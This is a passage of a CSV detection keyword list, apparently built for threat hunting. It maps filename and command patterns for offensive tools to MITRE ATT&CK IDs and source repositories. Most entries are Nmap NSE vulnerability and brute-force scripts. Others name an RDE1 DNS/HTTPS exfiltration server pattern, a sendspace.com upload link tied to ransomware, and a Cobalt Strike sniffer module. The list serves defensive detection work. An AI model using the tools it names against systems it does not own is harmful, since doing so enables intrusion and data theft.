+"* http-iis-short-name-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-iis-webdav-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-internal-ip-disclosure.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-joomla-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-jsonp-detection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-lexmark-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z"
+"* http-lfi.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z"
+"* http-litespeed-sourcecode-download.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. 
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z"
+"* http-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-majordomo2-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-malware-host.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-mcmp.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-method-tamper.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-mobileversion-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-nikto-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z"
+"* http-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-open-redirect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-passwd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-phpmyadmin-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-phpself-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-php-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-proxy-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-put.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-put-server.py*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* http-qnap-nas-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-referer-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-rfi-spider.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-robots.txt.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-robtex-reverse-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-robtex-shared-ns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* https://www.sendspace.com/file/*","greyware_tool_keyword","sendspace.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-sap-netweaver-leak.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-security-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-server-header.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-shellshock.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-sitemap-generator.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-slowloris.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-slowloris-check.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* HTTPSniffer *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* http-spider-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* http-sql-injection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* https-redirect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-stored-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-svn-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-svn-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-tenda-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"* http-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-tplink-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-trace.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-traceroute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-trane-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-unsafe-output-escaping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-useragent-tester.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-userdir-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vhosts.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-virustotal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vlcstreamer-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vmware-path-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2006-3392.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2009-3960.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2010-0738.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2010-2861.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security 